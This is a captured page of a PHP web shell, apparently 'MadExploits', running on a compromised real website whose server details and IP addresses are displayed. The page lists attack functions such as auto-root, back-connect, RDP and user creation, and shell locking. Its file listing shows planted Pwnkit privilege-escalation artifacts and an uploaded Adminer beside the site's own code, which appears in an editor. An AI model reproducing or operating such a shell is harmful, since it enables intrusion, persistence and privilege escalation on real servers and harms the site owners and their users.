Linux cool-chatelet.209-46-124-25.plesk.page 6.8.0-60-generic #63-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 19:04:15 UTC 2025 x86_64
nginx/1.26.3
: 209.46.124.25 | : 216.73.216.5
Cant Read [ /etc/named.conf ]
8.3.21
beghelli.com.mx_t822czighbk
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
vhosts /
beghelli.com.mx /
httpdocs /
cms /
ajax /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminAjax.php
1013
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
agentAjax.php
889
B
-rw-r--r--
agentResourcesAjax.php
0
B
-rw-r--r--
asociationsAjax.php
720
B
-rw-r--r--
catalogAjax.php
1.01
KB
-rw-r--r--
catalogCategoryAjax.php
1.19
KB
-rw-r--r--
categoryAjax.php
1.38
KB
-rw-r--r--
certificationsAjax.php
747
B
-rw-r--r--
cloudAjax.php
1.82
KB
-rw-r--r--
distributorAjax.php
967
B
-rw-r--r--
loginAjax.php
479
B
-rw-r--r--
mapAjax.php
1023
B
-rw-r--r--
mediaAjax.php
743
B
-rw-r--r--
newsAjax.php
664
B
-rw-r--r--
pedritoAjax.php
546
B
-rw-r--r--
productAjax.php
1.28
KB
-rw-r--r--
productCategoryAjax.php
759
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
sliderAjax.php
809
B
-rw-r--r--
successAjax.php
691
B
-rw-r--r--
technicalInformationAjax.php
815
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : categoryAjax.php
<?php $ajaxRequest = true; require_once "../config/app.php"; if (isset($_POST['agtres_mod'])) { require_once "../controller/categoryController.php"; $controller = new categoryController(); switch ($_POST['agtres_mod']) { case 'create-category': echo $controller->create_category_controller(); break; case 'create-resource': echo $controller->create_resource_controller(); break; case 'delcat': echo $controller->delete_category_controller(); break; case 'delres': echo $controller->delete_resource_controller(); break; case 'update-category': echo $controller->update_category_controller(); break; case 'update-resource': echo $controller->update_resource_controller(); break; case 'update-order': echo $controller->update_order_controller(); break; default: echo json_encode([ "Alerta" => "simple", "Titulo" => "Error", "Texto" => "Acción no válida", "Tipo" => "error" ]); break; } } else { session_unset(); session_destroy(); header("Location:" . SERVERURL . "index"); exit(); }
Close